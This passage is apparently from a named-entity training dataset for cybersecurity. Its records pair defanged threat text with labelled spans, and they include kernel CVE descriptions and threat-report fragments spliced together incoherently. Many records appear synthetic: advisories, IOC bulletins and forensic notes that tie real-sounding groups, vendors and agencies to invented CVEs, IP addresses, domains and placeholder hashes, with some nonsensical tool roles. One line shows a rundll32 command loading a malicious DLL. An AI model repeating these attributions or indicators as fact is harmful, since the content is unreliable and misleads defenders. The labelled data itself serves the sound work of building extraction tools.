0000ffff9372f000 x22: ffff7a54459e2000 x21: ffff7a546c1aa978\n[ 3106.014529] x20: ffffffe8d481f3c0 x19: 0000000000610041 x18: 0000000000000001\n[ 3106.019506] x17: 0000000000000001 x16: ffffffffffffffff x15: 0000000000000000\n[ 3106.024494] x14: ffffb85477fdfe08 x13: 0000ffff9372ffff x12: 0000000000000000\n[ 3106.029469] x11: 1fffef4a88a96be1 x10: ffff7a54454b5f0c x9 : ffffb854771b12f0\n[ 3106.034324] x8 : 0008000000000000 x7 : ffff7a546c1aa980 x6 : 0008000000000080\n[ 3106.038902] x5 : 00000000001207cf x4 : 0000ffff9372f000 x3 : ffffffe8d481f000\n[ 3106.043420] x2 : 0000000000610041 x1 : 0000000000000001 x0 : 0000000000000000\n[ 3106.047957] Call trace:\n[ 3106.049522]  try_grab_folio+0x11c/0x188\n[ 3106.051996]  follow_pmd_mask.constprop.0.isra.0+0x150/0x2e0\n[ 3106.055527]  follow_page_mask+0x1a0/0x2b8\n[ 3106.058118]  __get_user_pages+0xf0/0x348\n[ 3106.060647]  faultin_page_range+0xb0/0x360\n[ 3106.063651]  do_madvise+0x340/0x598\n\nLet's make huge_pte_lockptr() effectively use the same PT locks as any\ncore-mm page table walker would.  Add ptep_lockptr() to obtain the PTE\npage table lock using a pte pointer -- unfortunately we cannot convert\npte_lockptr() because virt_to_page() doesn't work with kmap'ed page tables\nwe can have with CONFIG_HIGHPTE.\n\nHandle CONFIG_PGTABLE_LEVELS correctly by checking in reverse order, such\nthat when e.g., CONFIG_PGTABLE_LEVELS==2 with\nPGDIR_SIZE==P4D_SIZE==PUD_SIZE==PMD_SIZE will work as expected.  Document\nwhy that works.\n\nThere is one ugly case: powerpc 8xx, whereby we have an 8 MiB hugetlb\nfolio being mapped using two PTE page tables.  While hugetlb wants to take\nthe PMD table lock, core-mm would grab the PTE table lock of one of both\nPTE page tables.  In such corner cases, we have to make sure that both\nlocks match, which is (fortunately!) currently guaranteed for 8xx as it\ndoes not support SMP and consequently doesn't use split PT locks.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/all/1bbfcc7f-f222-45a5-ac44-c5a1381c596d@redhat.com/", "spans": {"Indicator: https://lore.kernel.org/all/1bbfcc7f-f222-45a5-ac44-c5a1381c596d@redhat.com/": [[3677, 3761]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1321, 1325]], "System: KVM": [[1326, 1329]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-45024"}}
{"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . The malicious updaters were hosted on the official liveupdate01s[.]asus[.]com and liveupdate01[.]asus[.]com ASUS update servers . Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": {"Indicator: liveupdate01s.asus.com": [[249, 275]], "Indicator: liveupdate01.asus.com": [[280, 305]], "Organization: ASUS": [[306, 310]]}, "info": {"id": "cyberner_stix_train_007701", "source": "defanged_augment"}}
{"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91 [ . ] 245 [ . ] 228 [ . ] 56 and 176[.]57[.]215[.]92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10[.]25[.]100[.]1 and 10 [ . ] 25 [ . ] 100 [ . ] 2.", "spans": {"Organization: GRU": [[33, 36]], "Organization: Microsoft": [[63, 72]], "Malware: Industroyer2": [[180, 192], [706, 718]], "Malware: CaddyWiper": [[256, 266]], "Indicator: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "System: Windows": [[360, 367]], "Malware: OrcShred": [[409, 417]], "System: Linux": [[428, 433]], "System: Solaris": [[438, 445]], "Indicator: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "Indicator: 91.245.228.56": [[562, 593]], "Indicator: 176.57.215.92": [[598, 617]], "Indicator: 10.25.100.1": [[832, 849]], "Indicator: 10.25.100.2": [[854, 883]]}, "info": {"id": "malware_00022", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 194[.]81[.]11[.]8, the CrowdStrike IR team identified BatLoader running as C:\\Users\\Public\\Documents\\sam.hive. The threat actor, believed to be MuddyWater, used Burp Suite for credential harvesting and LaZagne for lateral movement. Exfiltrated data was sent to cdn-mail[.]info and authcdn[.]link. The initial dropper (SHA1: 8d6918f4f6e82b4e86d9a7abf67ec9341847e5da) was delivered via a phishing email from updates@auth-check[.]org. A second C2 node was observed at 62 [ . ] 155 [ . ] 216 [ . ] 253, with a persistence mechanism writing to /home/user/.config/shell.php.", "spans": {"Indicator: 194.81.11.8": [[64, 81]], "Organization: CrowdStrike": [[87, 98]], "Malware: BatLoader": [[118, 127]], "Indicator: cdn-mail.info": [[325, 340]], "Indicator: authcdn.link": [[345, 359]], "Indicator: 8d6918f4f6e82b4e86d9a7abf67ec9341847e5da": [[388, 428]], "Indicator: updates@auth-check.org": [[470, 494]], "Indicator: 62.155.216.253": [[529, 561]]}, "info": {"id": "synth_v2_00282", "source": "defanged_augment"}}
{"text": "] com and ora.studiolegalebasili [ . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www[ . ]poisonivy-rat[ . ]com .", "spans": {"Malware: China Chopper": [[37, 50]], "Malware: Poison Ivy": [[211, 221]], "Indicator: www.poisonivy-rat.com": [[314, 343]]}, "info": {"id": "cyberner_stix_train_003226", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-24392 is a critical buffer overflow affecting Windows Server 2019. FBI confirmed active exploitation by Charming Kitten in the wild. Exploitation delivers ShadowPad (SHA1: 92b73a73036a93c3213e153aaf6a65704f6a0553) which is dropped to C:\\Program Files\\Common Files\\shell.php. The exploit payload is hosted at hxxp://backupdata[ . ]link/collect and communicates to 180 [ . ] 44 [ . ] 159 [ . ] 144 for C2.", "spans": {"Vulnerability: CVE-2024-24392": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: Windows Server 2019": [[79, 98]], "Organization: FBI": [[100, 103]], "Malware: ShadowPad": [[188, 197]], "Indicator: 92b73a73036a93c3213e153aaf6a65704f6a0553": [[205, 245]], "Indicator: hxxp://backupdata.link/collect": [[341, 375]], "Indicator: 180.44.159.144": [[396, 428]]}, "info": {"id": "synth_v2_00785", "source": "defanged_augment"}}
{"text": "MSEdgeRedirect is a tool to redirect news, search, widgets, weather, and more to a user's default browser. MSEdgeRedirect versions before 0[.]5[.]0[.]1 are vulnerable to Remote Code Execution via specifically crafted URLs. This vulnerability requires user interaction and the acceptance of a prompt. With how MSEdgeRedirect is coded, parameters are impossible to pass to any launched file. However, there are two possible scenarios in which an attacker can do more than a minor annoyance. In Scenario 1 (confirmed), a user visits an attacker controlled webpage; the user is prompted with, and downloads, an executable payload; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and RCE executes the payload the user previously downloaded, if the download path is successfully guessed. In Scenario 2 (not yet confirmed), a user visits an attacked controlled webpage; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and a payload on a remote, attacker controlled, SMB server is executed. The issue was found in the _DecodeAndRun() function, in which I incorrectly assumed _WinAPI_UrlIs() would only accept web resources. Unfortunately, file:/// passes the default _WinAPI_UrlIs check(). File paths are now directly checked for and must fail. There is no currently known exploitation of this vulnerability in the wild. A patched version, 0[.]5[.]0[.]1, has been released that checks for and denies these crafted URLs. There are no workarounds for this issue. Users are advised not to accept any unexpected prompts from web pages.", "spans": {"Indicator: 0.5.0.1": [[138, 151], [1394, 1407]], "Vulnerability: Remote Code Execution": [[170, 191]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-43844"}}
{"text": "Vulnerability Advisory: CVE-2024-36290 is a critical remote code execution affecting Zyxel USG. Trend Micro confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers Lumma Stealer (SHA256: e73c5523060665c8e2b5559518acff04518f6b43f0870d44efb3cf4abd61592d) which is dropped to /etc/cron.d/svchost.exe. The exploit payload is hosted at hxxps://login-relay[ . ]cc/secure/token and communicates to 172 [ . ] 51 [ . ] 226 [ . ] 181 for C2.", "spans": {"Vulnerability: CVE-2024-36290": [[24, 38]], "Vulnerability: remote code execution": [[53, 74]], "System: Zyxel USG": [[85, 94]], "Organization: Trend Micro": [[96, 107]], "Malware: Lumma Stealer": [[192, 205]], "Indicator: e73c5523060665c8e2b5559518acff04518f6b43f0870d44efb3cf4abd61592d": [[215, 279]], "Indicator: hxxps://login-relay.cc/secure/token": [[359, 398]], "Indicator: 172.51.226.181": [[419, 451]]}, "info": {"id": "synth_v2_00794", "source": "defanged_augment"}}
{"text": "Blog Post by Kaspersky GReAT: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-19065 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from support@document-share[.]link delivering RedLine Stealer. Post-compromise, the attackers deploy IcedID and use Hashcat for reconnaissance. C2 infrastructure includes 10 [ . ] 78 [ . ] 242 [ . ] 105 and portal-edge[.]cc. A staging server at hxxp://relaydata[.]io/collect hosts additional tooling. Key artifact: C:\\Windows\\System32\\csrss.exe (SHA256: 21b1afd43645efe4e5eb322c5ffe88cc4b18270351ecd47c80f7c75bd84b1c34).", "spans": {"Organization: Kaspersky GReAT": [[13, 28]], "Vulnerability: CVE-2025-19065": [[132, 146]], "System: MOVEit Transfer": [[155, 170]], "Indicator: support@document-share.link": [[246, 275]], "Malware: RedLine Stealer": [[287, 302]], "Malware: IcedID": [[342, 348]], "Indicator: 10.78.242.105": [[412, 443]], "Indicator: portal-edge.cc": [[448, 464]], "Indicator: http://relaydata.io/collect": [[486, 515]], "Indicator: 21b1afd43645efe4e5eb322c5ffe88cc4b18270351ecd47c80f7c75bd84b1c34": [[595, 659]]}, "info": {"id": "synth_v2_01652", "source": "defanged_augment"}}
{"text": "TG-3390 : 72[.]11[.]141[.]133 .", "spans": {"Indicator: 72.11.141.133": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001765", "source": "defanged_augment"}}
{"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121 [ . ] 127 [ . ] 249 [ . ] 74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"Malware: rastls.dll": [[165, 175]], "Malware: Sycmentec.config files": [[180, 202]], "Malware: ELMER": [[209, 214]], "Indicator: 6c33223db475f072119fe51a2437a542": [[223, 255]], "Indicator: 121.127.249.74": [[286, 318]], "Malware: AgentTesla remote access trojan ( RAT": [[366, 403]]}, "info": {"id": "cyberner_stix_train_000502", "source": "defanged_augment"}}
{"text": "IOC Bulletin - SystemBC Campaign:\nNetwork Indicators:\n- 201[.]120[.]184[.]182\n- 45[.]234[.]87[.]159\n- 10[.]173[.]241[.]229\n- secure-sync[.]com\n- cache-node[.]site\nURLs:\n- hxxp://static-node[.]info/portal/verify\n- hxxp://synclogin[ . ]top/wp-content/uploads/doc.php\nEmail Senders:\n- notification@urgent-notice[.]online\n- helpdesk@auth-check[.]org\nFile Indicators:\n- SHA1: f0fbf39e7c2e6911cafb7689ddde128ebb075953\n- MD5: 7aec4ec51ae460a3260d45f1915d37b6\n- Drop path: C:\\Users\\admin\\Desktop\\csrss.exe", "spans": {"Malware: SystemBC": [[15, 23]], "Indicator: 201.120.184.182": [[56, 77]], "Indicator: 45.234.87.159": [[80, 99]], "Indicator: 10.173.241.229": [[102, 122]], "Indicator: secure-sync.com": [[125, 142]], "Indicator: cache-node.site": [[145, 162]], "Indicator: http://static-node.info/portal/verify": [[171, 210]], "Indicator: http://synclogin.top/wp-content/uploads/doc.php": [[213, 264]], "Indicator: notification@urgent-notice.online": [[282, 317]], "Indicator: helpdesk@auth-check.org": [[320, 345]], "Indicator: f0fbf39e7c2e6911cafb7689ddde128ebb075953": [[371, 411]], "Indicator: 7aec4ec51ae460a3260d45f1915d37b6": [[419, 451]]}, "info": {"id": "synth_v2_01444", "source": "defanged_augment"}}
{"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset[.]com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": {"Organization: group": [[309, 314]], "Organization: nation states": [[332, 345]], "Indicator: eset.com": [[249, 259]]}, "info": {"id": "cyberner_stix_train_006677", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at /etc/cron.d/winlogon.exe. Memory dump analysis confirmed execution of Certutil. Registry modifications pointed to persistence via /usr/local/bin/agent.py. Network forensics identified connections to 22 [ . ] 109 [ . ] 195 [ . ] 236 and cloud-edge[ . ]live. Email headers traced the initial vector to alert@document-share[.]link. File C:\\ProgramData\\taskhost.exe (SHA1: 213fe93b81928609f1b06209c4151478790cda64) was identified as the initial dropper. A staging URL hxxps://relay-gateway[.]io/api/v2/auth resolved to 49[.]9[.]173[.]37. Secondary artifact hash: SHA256: 57d7e72f63a13cd53260efd61521680f35f37bc1ba68bdad5736b28ac80a4420.", "spans": {"Indicator: 22.109.195.236": [[295, 327]], "Indicator: cloud-edge.live": [[332, 351]], "Indicator: alert@document-share.link": [[396, 423]], "Indicator: 213fe93b81928609f1b06209c4151478790cda64": [[465, 505]], "Indicator: https://relay-gateway.io/api/v2/auth": [[560, 598]], "Indicator: 49.9.173.37": [[611, 628]], "Indicator: 57d7e72f63a13cd53260efd61521680f35f37bc1ba68bdad5736b28ac80a4420": [[663, 727]]}, "info": {"id": "synth_v2_01184", "source": "defanged_augment"}}
{"text": "Symantec detected a multi-stage attack chain. The initial phishing email from support@credential-check[.]site contained a link to hxxp://backupcdn[ . ]net/assets/js/payload.js. This redirected to hxxps://backup-cloud[.]live/wp-content/uploads/doc.php on relaystorage[ . ]live. A secondary email from hr@document-share[ . ]link pointed to hxxp://syncsecure[.]tech/download/update.exe which delivered WarmCookie. The final payload callback was hxxps://updateproxy[ . ]club/wp-content/uploads/doc.php resolving to 192[.]162[.]9[.]96 via data-sync[.]link.", "spans": {"Organization: Symantec": [[0, 8]], "Indicator: support@credential-check.site": [[78, 109]], "Indicator: hxxp://backupcdn.net/assets/js/payload.js": [[130, 175]], "Indicator: https://backup-cloud.live/wp-content/uploads/doc.php": [[196, 250]], "Indicator: relaystorage.live": [[254, 275]], "Indicator: hr@document-share.link": [[300, 326]], "Indicator: http://syncsecure.tech/download/update.exe": [[338, 382]], "Malware: WarmCookie": [[399, 409]], "Indicator: hxxps://updateproxy.club/wp-content/uploads/doc.php": [[442, 497]], "Indicator: 192.162.9.96": [[511, 529]], "Indicator: data-sync.link": [[534, 550]]}, "info": {"id": "synth_v2_01745", "source": "defanged_augment"}}
{"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations . wsc_proxy[ . ]exe plugins-setup[ . ]exe SoftManager[ . ]exe GetEFA[.]exe . Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"Organization: CTU": [[184, 187]], "Indicator: wsc_proxy.exe": [[270, 287]], "Indicator: plugins-setup.exe": [[288, 309]], "Indicator: SoftManager.exe": [[310, 329]], "Indicator: GetEFA.exe": [[330, 342]], "Malware: Rhysida": [[345, 352]]}, "info": {"id": "cyberner_stix_train_003302", "source": "defanged_augment"}}
{"text": "Recorded Future observed Turla, the Russian cyber espionage group also tracked as VENOMOUS BEAR, using compromised Starlink terminals as command-and-control relay points in Ukraine. The group deployed an updated version of the Snake implant that uses named pipes for inter-process communication and encrypts all traffic with ChaCha20. Network indicators included the domain cdn-analytics[.]cloud-delivery[.]net.", "spans": {"Organization: Recorded Future": [[0, 15]], "System: Starlink": [[115, 123]], "Malware: Snake": [[227, 232]], "Indicator: cdn-analytics.cloud-delivery.net": [[374, 410]]}, "info": {"id": "recordedfuture_00002", "source": "defanged_augment"}}
{"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . The second , aptly titled \" kontrakt87[ . ]doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"Indicator: kontrakt87.doc": [[217, 235]], "Organization: telecommunications service": [[257, 283]], "Organization: MegaFon": [[298, 305]], "Organization: mobile phone operator": [[324, 345]]}, "info": {"id": "cyberner_stix_train_000282", "source": "defanged_augment"}}
{"text": "It was executed via rundll32 commands such as : rundll32[ . ]exe “ C:\\Windows\\twain_64[.]dll ” .", "spans": {"Indicator: rundll32.exe": [[48, 64]], "Indicator: C:\\Windows\\twain_64.dll": [[67, 92]]}, "info": {"id": "cyberner_stix_train_007957", "source": "defanged_augment"}}
{"text": "FBI published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2023-33283 in MOVEit Transfer. The attackers deployed TrickBot via ADFind, establishing C2 communication with 192 [ . ] 26 [ . ] 245 [ . ] 44 and cloud-update[ . ]online. A secondary payload was downloaded from hxxp://gatewaylogin[ . ]site/callback. The malware binary (SHA1: 21acf9cca989c315cc10860dd3d9802687a3fc1d) was dropped to /dev/shm/update.dll. Phishing emails were sent from noreply@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 38 [ . ] 124 [ . ] 16 [ . ] 147.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2023-33283": [[96, 110]], "System: MOVEit Transfer": [[114, 129]], "Malware: TrickBot": [[154, 162]], "Indicator: 192.26.245.44": [[210, 241]], "Indicator: cloud-update.online": [[246, 269]], "Indicator: hxxp://gatewaylogin.site/callback": [[311, 348]], "Indicator: 21acf9cca989c315cc10860dd3d9802687a3fc1d": [[376, 416]], "Indicator: noreply@urgent-notice.online": [[485, 517]], "Indicator: 38.124.16.147": [[583, 614]]}, "info": {"id": "synth_v2_00067", "source": "defanged_augment"}}
{"text": "XWiki Platform Old Core is a core package for XWiki Platform, a generic wiki platform. Prior to versions 13[.]1[.]0[.]5 and 14.3-rc-1, some resources are missing a check for inactive (not yet activated or disabled) users in XWiki, including the REST service. This means a disabled user can enable themselves using a REST call. On the same way some resources handler created by extensions are not protected by default, so an inactive user could perform actions for such extensions. This issue has existed since at least version 1.1 of XWiki for instance configured with the email activation required for new users. Now it's more critical for versions 11.3-rc-1 and later since the maintainers provided the capability to disable user without deleting them and encouraged using that feature. XWiki 14.3-rc-1 and XWiki 13.10.5 contain a patch. There is no workaround for this other than upgrading XWiki.", "spans": {"Indicator: 13.1.0.5": [[105, 119]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-36090"}}
{"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search[ . ]asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info[ . ]asp . ) The POST body is now encoded . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": {"Malware: ShimRatReporter": [[60, 75]], "Indicator: search.asp": [[119, 133]], "Malware: Aumlib": [[159, 165]], "Indicator: info.asp": [[200, 212]], "Organization: FireEye": [[248, 255]]}, "info": {"id": "cyberner_stix_train_004284", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Dridex (MD5: 24a42dceaf8d2ced05517979fdab3652). Upon execution on Palo Alto PAN-OS, the sample creates /tmp/beacon.dll and injects into legitimate processes. Network analysis shows beaconing to 192[.]53[.]8[.]121 every 60 seconds and DNS queries to login-secure[ . ]club. The second stage was fetched from hxxps://gateway-update[.]top/collect and written to /var/tmp/update.dll. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA256: 6412d63d36cf538bd4557562d5580fda77148dd599996175b852e3db158b977c) was extracted from the unpacked payload.", "spans": {"Malware: Dridex": [[25, 31]], "Indicator: 24a42dceaf8d2ced05517979fdab3652": [[38, 70]], "System: Palo Alto PAN-OS": [[91, 107]], "Indicator: 192.53.8.121": [[219, 237]], "Indicator: login-secure.club": [[274, 295]], "Indicator: https://gateway-update.top/collect": [[331, 367]], "Indicator: 6412d63d36cf538bd4557562d5580fda77148dd599996175b852e3db158b977c": [[492, 556]]}, "info": {"id": "synth_v2_00629", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Ryuk Campaign:\nNetwork Indicators:\n- 172[.]63[.]248[.]241\n- 219 [ . ] 5 [ . ] 15 [ . ] 52\n- 92[.]201[.]141[.]235\n- storageproxy[ . ]link\n- proxy-backup[.]link\nURLs:\n- hxxp://portalportal[ . ]com/download/update.exe\n- hxxps://portal-portal[ . ]club/portal/verify\nEmail Senders:\n- verify@mail-service[.]info\n- alert@account-update[ . ]xyz\nFile Indicators:\n- MD5: 358de74077e360f643efce8b9904214d\n- SHA1: 58f8c74e2e01b9c0b063f4972b29620253fba227\n- Drop path: C:\\Windows\\Temp\\dropper.ps1", "spans": {"Malware: Ryuk": [[15, 19]], "Indicator: 172.63.248.241": [[52, 72]], "Indicator: 219.5.15.52": [[75, 104]], "Indicator: 92.201.141.235": [[107, 127]], "Indicator: storageproxy.link": [[130, 151]], "Indicator: proxy-backup.link": [[154, 173]], "Indicator: http://portalportal.com/download/update.exe": [[182, 229]], "Indicator: hxxps://portal-portal.club/portal/verify": [[232, 276]], "Indicator: verify@mail-service.info": [[294, 320]], "Indicator: alert@account-update.xyz": [[323, 351]], "Indicator: 358de74077e360f643efce8b9904214d": [[376, 408]], "Indicator: 58f8c74e2e01b9c0b063f4972b29620253fba227": [[417, 457]]}, "info": {"id": "synth_v2_01490", "source": "defanged_augment"}}
{"text": "CSRF in Web Compliance Manager in Quest Policy Authority 8[.]1[.]2[.]200 allows remote attackers to force user modification/creation via a specially crafted link to the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer", "spans": {"Indicator: 8.1.2.200": [[57, 72]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-35722"}}
{"text": "IOC Bulletin - RedLine Stealer Campaign:\nNetwork Indicators:\n- 192 [ . ] 133 [ . ] 200 [ . ] 47\n- 172[.]164[.]217[.]38\n- 172 [ . ] 56 [ . ] 81 [ . ] 106\n- login-portal[.]link\n- auth-edge[ . ]site\nURLs:\n- hxxp://update-static[ . ]dev/callback\n- hxxps://cache-api[.]cc/collect\nEmail Senders:\n- admin@urgent-notice[.]online\n- info@credential-check[.]site\nFile Indicators:\n- SHA1: d2bf09f886129b6fca988b8f2f7cf43950e9a613\n- SHA256: 2546eb6d93eb3abfea5139a395dba6467d4c751dcf7b8f32cf4a57e556cd7a34\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll", "spans": {"Malware: RedLine Stealer": [[15, 30]], "Indicator: 192.133.200.47": [[63, 95]], "Indicator: 172.164.217.38": [[98, 118]], "Indicator: 172.56.81.106": [[121, 152]], "Indicator: login-portal.link": [[155, 174]], "Indicator: auth-edge.site": [[177, 195]], "Indicator: hxxp://update-static.dev/callback": [[204, 241]], "Indicator: https://cache-api.cc/collect": [[244, 274]], "Indicator: admin@urgent-notice.online": [[292, 320]], "Indicator: info@credential-check.site": [[323, 351]], "Indicator: d2bf09f886129b6fca988b8f2f7cf43950e9a613": [[377, 417]], "Indicator: 2546eb6d93eb3abfea5139a395dba6467d4c751dcf7b8f32cf4a57e556cd7a34": [[428, 492]]}, "info": {"id": "synth_v2_01373", "source": "defanged_augment"}}
{"text": "Blog Post by Symantec: Tracking TA505's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against Palo Alto PAN-OS deployments. The initial access vector involves spear-phishing emails from verify@phishing-domain[ . ]com delivering FormBook. Post-compromise, the attackers deploy PlugX and use SharpHound for reconnaissance. C2 infrastructure includes 20 [ . ] 240 [ . ] 135 [ . ] 24 and gateway-portal[.]cc. A staging server at hxxps://backupstorage[.]top/panel/index.html hosts additional tooling. Key artifact: /tmp/backdoor.elf (MD5: 56453130dc7b949fbbbe2172f0b21ef9).", "spans": {"Organization: Symantec": [[13, 21]], "Vulnerability: CVE-2020-46781": [[117, 131]], "System: Palo Alto PAN-OS": [[140, 156]], "Indicator: verify@phishing-domain.com": [[232, 262]], "Malware: FormBook": [[274, 282]], "Malware: PlugX": [[322, 327]], "Indicator: 20.240.135.24": [[394, 425]], "Indicator: gateway-portal.cc": [[430, 449]], "Indicator: hxxps://backupstorage.top/panel/index.html": [[471, 515]], "Indicator: 56453130dc7b949fbbbe2172f0b21ef9": [[580, 612]]}, "info": {"id": "synth_v2_01583", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: fix memory allocation in nvme_pr_read_keys()\n\nnvme_pr_read_keys() takes num_keys from userspace and uses it to\ncalculate the allocation size for rse via struct_size(). The upper\nlimit is PR_KEYS_MAX (64K).\n\nA malicious or buggy userspace can pass a large num_keys value that\nresults in a 4MB allocation attempt at most, causing a warning in\nthe page allocator when the order exceeds MAX_PAGE_ORDER.\n\nTo fix this, use kvzalloc() instead of kzalloc().\n\nThis bug has the same reasoning and fix with the patch below:\nhxxps://lore[.]kernel[.]org/linux-block/20251212013510.3576091-1-kartikey406@gmail.com/\n\nWarning log:\nWARNING: mm/page_alloc.c:5216 at __alloc_frozen_pages_noprof+0x5aa/0x2300 mm/page_alloc.c:5216, CPU#1: syz-executor117/272\nModules linked in:\nCPU: 1 UID: 0 PID: 272 Comm: syz-executor117 Not tainted 6.19.0 #1 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[.]16[.]3-0-ga6ed6b701f0a-prebuilt[.]qemu[.]org 04/01/2014\nRIP: 0010:__alloc_frozen_pages_noprof+0x5aa/0x2300 mm/page_alloc.c:5216\nCode: ff 83 bd a8 fe ff ff 0a 0f 86 69 fb ff ff 0f b6 1d f9 f9 c4 04 80 fb 01 0f 87 3b 76 30 ff 83 e3 01 75 09 c6 05 e4 f9 c4 04 01 <0f> 0b 48 c7 85 70 fe ff ff 00 00 00 00 e9 8f fd ff ff 31 c0 e9 0d\nRSP: 0018:ffffc90000fcf450 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 1ffff920001f9ea0\nRDX: 0000000000000000 RSI: 000000000000000b RDI: 0000000000040dc0\nRBP: ffffc90000fcf648 R08: ffff88800b6c3380 R09: 0000000000000001\nR10: ffffc90000fcf840 R11: ffff88807ffad280 R12: 0000000000000000\nR13: 0000000000040dc0 R14: 0000000000000001 R15: ffffc90000fcf620\nFS:  0000555565db33c0(0000) GS:ffff8880be26c000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000002000000c CR3: 0000000003b72000 CR4: 00000000000006f0\nCall Trace:\n <TASK>\n alloc_pages_mpol+0x236/0x4d0 mm/mempolicy.c:2486\n alloc_frozen_pages_noprof+0x149/0x180 mm/mempolicy.c:2557\n ___kmalloc_large_node+0x10c/0x140 mm/slub.c:5598\n __kmalloc_large_node_noprof+0x25/0xc0 mm/slub.c:5629\n __do_kmalloc_node mm/slub.c:5645 [inline]\n __kmalloc_noprof+0x483/0x6f0 mm/slub.c:5669\n kmalloc_noprof include/linux/slab.h:961 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n nvme_pr_read_keys+0x8f/0x4c0 drivers/nvme/host/pr.c:245\n blkdev_pr_read_keys block/ioctl.c:456 [inline]\n blkdev_common_ioctl+0x1b71/0x29b0 block/ioctl.c:730\n blkdev_ioctl+0x299/0x700 block/ioctl.c:786\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x1bf/0x220 fs/ioctl.c:583\n x64_sys_call+0x1280/0x21b0 mnt/fuzznvme_1/fuzznvme/linux-build/v6.19/./arch/x86/include/generated/asm/syscalls_64.h:17\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0x71/0x330 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fb893d3108d\nCode: 28 c3 e8 46 1e 00 00 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffff61f2f38 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007ffff61f3138 RCX: 00007fb893d3108d\nRDX: 0000000020000040 RSI: 00000000c01070ce RDI: 